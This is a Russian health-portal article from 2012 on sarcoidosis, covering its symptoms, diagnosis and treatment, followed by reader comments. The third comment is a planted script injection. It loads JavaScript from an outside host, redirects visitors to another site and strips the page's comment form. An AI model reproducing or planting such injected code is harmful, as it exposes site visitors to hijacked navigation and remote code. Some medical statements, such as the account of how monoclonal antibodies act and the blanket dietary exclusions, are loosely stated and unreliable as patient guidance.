Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Саркоидоз: загадочная бол...  >>  Саркоидоз: загадочная болезнь легких
 
Обратная связь
 

Саркоидоз: загадочная болезнь легких

Размер шрифта
21 марта 2012 10:00
  • google_analytics: false
  • Нравится

Кашель на протяжении целого месяца – серьезный повод для беспокойства и для того, чтобы пройти обследование. Иначе простой кашель может обернуться тяжелым заболеванием. Что такое саркоидоз и как его лечить?

1 

Саркоидоз – системное заболевание, которое в первую очередь поражает дыхательную систему. Саркоидозом чаще болеют женщины до 40 лет (20-29 лет).

Причины

Причина саркоидоза до сих пор не выяснена. Однако, если болезнь наблюдалась у родственников, то риски повышаются.

Механизм

Сбой происходит на уровне иммунитета. В различных частях тела развиваются гранулемы. Это скопления клеток иммунной системы (лимфоцитов и макрофагов), которые атакуют собственные органы и ткани. Заболевание чаще всего проявляется в легких, с прикорневых лимфатических узлов. Увеличенные лимфоузлы, как при туберкулезе, приводят к нарушению функции дыхания.

Симптомы

  • повышение температуры;
  • кашель, затруднение дыхания;
  • красные бугорки на коже голени;
  • воспаление оболочек глаз;
  • нарушение сердечного ритма;
  • боль в суставах.

Заболевание затрагивает все органы и системы. При образовании гранулем в печени печеночная ткань начинает разрушаться. Поражение почек проявляется мочекаменной болезнью.

Диагностика

Гранулемы легких бывают и при туберкулезе. Отличия можно обнаружить только при биопсии. И найти инфекцию при саркоидозе не удается.

Лечение

  1. Преднизолон (кортикостероиды) является стандартным лечением при аутоиммунных процессах.

  2. Моноклональные антитела призваны связать, обезвредить собственные антитела к своим органам и тканям.

  3. Цитостатики – препараты, подавляющие размножение иммунных клеток. Различные цитостатики применяют также и при опухолевых процессах.

Цитостатические средства имеют множество побочных эффектов, поэтому, как и гормоны, назначаются под строгим контролем врача.

Лечение любой аутоиммунной болезни может занимать долгие годы. Но существуют способы облегчить состояние пациента:

  • Исключить из рациона рафинированные углеводы (сахар и муку) и все продукты на их основе. Рафинированные углеводы являются продуктами, поддерживающими воспаление. Исключение таких продуктов питания помогает не только при саркоидозе, но и при других болезнях суставов.
  • Бросить курить. Все воспалительные процессы протекают более остро именно у курильщиков.
  • Исключить молочные продукты. Молочные продукты богаты кальцием, что может усугубить и без того повышенное содержание кальция в крови и моче.

Тяжелая легочная недостаточность, как осложнение саркоидоза, способна привести к пересадке легкого.
 

 
Сюжеты по теме:
Сам себе враг. Как победить саркоидоз
 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

21 марта 2012 в 14:31

Цитировать   |   Пожаловаться

Цитата: "Тяжелая легочная недостаточность, как осложнение саркоидоза, способна привести к пересадке легкого."

Читать следует "Тяжелая легочная недостаточность, как осложнение саркоидоза, способна привести к смерти (поскольку легкие у нас не пересаживают уже давно) "

2 - Гость

21 марта 2012 в 20:01

Цитировать   |   Пожаловаться

Медицина не стоит на месте. В России пересаживают легкие. Даже вместе с трахеей. А вы - отстали от жизни. http://www.izvestia.ru/news/316841 2006-й год между прочим

3 - zzzzzz

30 июня 2015 в 23:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.